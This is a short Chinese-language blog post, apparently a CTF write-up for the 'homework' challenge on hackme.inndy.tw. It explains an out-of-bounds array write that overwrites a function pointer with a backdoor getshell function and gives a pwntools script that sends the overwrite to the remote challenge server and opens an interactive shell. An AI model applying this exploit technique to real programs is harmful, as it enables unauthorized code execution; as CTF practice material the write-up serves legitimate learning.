homework

作者: 2mpossible | 来源:发表于2018-08-14 17:19 被阅读0次

数组越界,可以通过编辑功能修改say_goodbye函数的地址为后门函数getshell


exp:

from pwn import *

#p = process('./homework')
p = remote('hackme.inndy.tw',7701)

p.recvuntil('name? ')
p.sendline('aaaa')
p.recvuntil('> ')
p.sendline('1')
p.recvuntil('edit: ')
p.sendline('14')
p.recvuntil('many? ')
p.sendline(str(0x080485FB))

p.recvuntil('> ')
p.sendline('0')

p.interactive()

相关文章

网友评论

      本文标题:homework

      本文链接:https://www.haomeiwen.com/subject/olivbftx.html